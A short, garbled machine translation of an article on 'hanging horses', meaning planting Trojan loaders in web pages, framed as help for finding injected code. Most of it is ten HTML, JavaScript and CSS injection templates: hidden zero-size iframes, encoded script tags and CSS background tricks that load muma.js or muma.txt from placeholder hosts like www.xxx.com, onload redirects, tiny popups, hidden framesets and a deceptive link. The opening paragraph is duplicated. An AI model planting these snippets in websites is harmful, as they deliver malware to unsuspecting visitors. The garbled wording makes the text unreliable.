This article refers to the bad people often use the web page hanging horse way, so that they can prevent their own web pages, as long as the detection of these often used to hang horses place, it is easy to find the location of the Trojan.
This article refers to the bad people often use the web page hanging horse way, so that they can prevent their own web pages, as long as the detection of these often used to hang horses place, it is easy to find the location of the Trojan.
One: Frame hanging horse
<iframe src= Address width=0 height=0></iframe>
Where the "address" can enter a malicious Web site links, etc.
Two: JS file hanging Horse
As long as the JS file, can be maliciously modified to be linked to malicious code, generally quoted by the entire station JS code is most likely to be linked to the Trojan, detection we can see the JS code on the left or below, the bad guys like the malicious code and normal code between a lot of space or return to hide, So to see more JS code page has been deliberately elongated and so on.
Three: JS deformation encryption
<script language= "Jscript.encode" src=http://www.xxx.com/muma.txt></script>
Muma.txt can be changed to any suffix
four: Body hanging horse
<body onload= "window.location= ' address"; ></body>
Five: Concealed Hanging horse
Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n<iframe src= ' http://www.xxx.com/muma.htm/' > </iframe> ';
Six: the horse hanging in CSS
Body {
Background-image:url (' Javascript:document.write ("<script src=http://www.xxx.net/muma.js></script>")}
This way is more ruthless, but also more difficult to find.
Seven: Jaja Hanging Horse
<script language=javascript>
window.open ("Address", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1 ");
</script>
Eight: Picture camouflage
<iframe src= "net horse address" height=0 width=0></iframe>
</center>
Nine: Disguise call
<frameset rows= "444,0" cols= "*" >
<frame src= "Open Web page" framborder= "no" scrolling= "Auto" noresize marginwidth= "0" margingheight= "0" >
<frame src= "Net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>
Ten: Advanced Deception
<a href= "http://www.163.com (confuse connection address, show this address point to Trojan address)" onmouseover= "www_163_com (); return true; " > page to display the content </a>
<script language= "JavaScript" >
function www_163_com ()
{
var url= "net horse address";
Open (URL, "NewWindow", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no," Copyhistory=yes,width=800,height=600,left=10,top=10 ");
}
</SCRIPT>